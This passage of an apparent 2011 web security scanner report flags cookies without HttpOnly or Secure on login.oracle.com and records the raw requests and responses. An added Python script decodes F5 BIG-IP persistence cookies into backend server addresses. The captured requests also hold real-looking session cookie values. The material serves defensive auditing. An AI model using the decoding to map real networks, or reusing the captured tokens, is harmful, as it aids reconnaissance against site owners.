X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;
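
Every item in this section (13.80 through 13.91) closes with the same advice: review the contents of the cookie to determine its function. The script below, added here as a worked example and not part of the scanner report or of any scanned site's code, does that triage on raw HTTP responses. It parses each Set-Cookie header, flags missing HttpOnly and Secure attributes, separates a deletion (empty value or a past Expires, as in the cnbc.com logout response of 13.85) from a live cookie, applies a name heuristic for session-like cookies, and goes one step beyond the report by decoding the F5 BIGipServer persistence values seen in 13.83 and 13.86 through 13.91, which encode the backend server's IPv4 address and port as little-endian decimal integers (a private address there is a topology disclosure in its own right). The sample responses are constructed from headers shown on this page; SESSION_HINTS, REPORT_TIME and the function names are assumptions of this example.

```python
"""Cookie triage for raw HTTP responses.  Added example, not part of the
scanner report; sample responses are constructed from headers shown in
items 13.83, 13.85 and 13.86 of this report."""
import re, socket, struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Assumed heuristic: name fragments that usually mark session/auth cookies.
SESSION_HINTS = ("sess", "sid", "auth", "token", "login", "pass", "remember")
# Assumed reference time (the report's date) so 2011 Expires values are
# judged as they were when the scan ran, not against today's clock.
REPORT_TIME = datetime(2011, 9, 6, 16, 0, tzinfo=timezone.utc)

def parse_set_cookie(header_value):
    """(name, value, attrs); attribute names lower-cased, bare flags map to ''."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs

def decode_bigip(value):
    """Decode an F5 BIGipServer persistence value IP.PORT.0000: the backend
    IPv4 address and port, each stored as a little-endian decimal integer.
    Returns (ip, port), or None for the IPv6 / route-domain encodings."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.0000", value)
    if not m or int(m.group(1)) > 0xFFFFFFFF or int(m.group(2)) > 0xFFFF:
        return None
    ip = socket.inet_ntoa(struct.pack("<I", int(m.group(1))))
    port = struct.unpack(">H", struct.pack("<H", int(m.group(2))))[0]
    return ip, port

def is_private(ip):
    """RFC 1918 check: a private backend address is a topology disclosure."""
    a, b = (int(x) for x in ip.split(".")[:2])
    return a == 10 or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)

def triage(raw_response, now=REPORT_TIME):
    """Return one finding dict per Set-Cookie header in a raw HTTP response."""
    findings = []
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        name, value, attrs = parse_set_cookie(line.split(":", 1)[1])
        expired = False
        if "expires" in attrs:
            try:
                expired = parsedate_to_datetime(attrs["expires"]) < now
            except (TypeError, ValueError):
                pass  # unparseable or naive date: treat as not expired
        is_f5 = name.lower().startswith("bigipserver")
        bigip = decode_bigip(value) if is_f5 else None
        findings.append({
            "name": name,
            "httponly": "httponly" in attrs,
            "secure": "secure" in attrs,
            "domain": attrs.get("domain", "(host-only)"),
            "deletion": value == "" or expired,  # server clearing the cookie
            "session_like": not is_f5 and any(h in name.lower() for h in SESSION_HINTS),
            "bigip": bigip,
            "bigip_private": bool(bigip) and is_private(bigip[0]),
        })
    return findings

def describe(f):
    """One report line per cookie, in the spirit of the issue text above."""
    notes = []
    if f["deletion"]:
        notes.append("deletion (empty value or past Expires): nothing to protect")
    else:
        notes += [n for k, n in (("httponly", "no HttpOnly"), ("secure", "no Secure")) if not f[k]]
        if f["session_like"]:
            notes.append("name suggests a session/auth token: HttpOnly matters here")
    if f["bigip"]:
        ip, port = f["bigip"]
        notes.append(f"F5 persistence -> {ip}:{port}" + (" (RFC 1918)" if f["bigip_private"] else ""))
    return f"{f['name']} [{f['domain']}]: " + "; ".join(notes)

# Constructed samples, modeled on responses shown on this page.
CNBC_LOGOUT = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/\r\n"
    "Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/\r\n"
    "Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/\r\n"
    "Location: http://www.cnbc.com\r\n\r\n"
)
ORACLE_LOGIN = (
    "HTTP/1.1 404 Not Found\r\n"
    "Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/\r\n\r\n"
)
SALESFORCE_LCT = "HTTP/1.1 200 OK\r\nSet-Cookie: BIGipServerlct-pool=70574602.38687.0000; path=/\r\n\r\n"

if __name__ == "__main__":
    for sample in (CNBC_LOGOUT, ORACLE_LOGIN, SALESFORCE_LCT):
        for finding in triage(sample):
            print(describe(finding))
```

Run as a script it prints one line per cookie. The two BIGipServer values taken from this page decode to 141.146.12.93:8002 for login.oracle.com (a public address) and 10.226.52.4:8087 for lct.salesforce.com (RFC 1918), which is exactly the kind of detail the "review the contents" step is meant to surface. The Secure check is relevant to the login.oracle.com items: they are served over HTTPS and the BIGipServer cookie carries neither Secure nor HttpOnly.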

13.91. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_cj
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.D.di........
.,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;

13.92. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpq6uHK6EVADUS1EHWFB01t_cC
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;

13.93. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-line.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC7v6uHK6EVADUS1EHWFB01t_cd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.............!.......,..............P.;

13.94. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 198
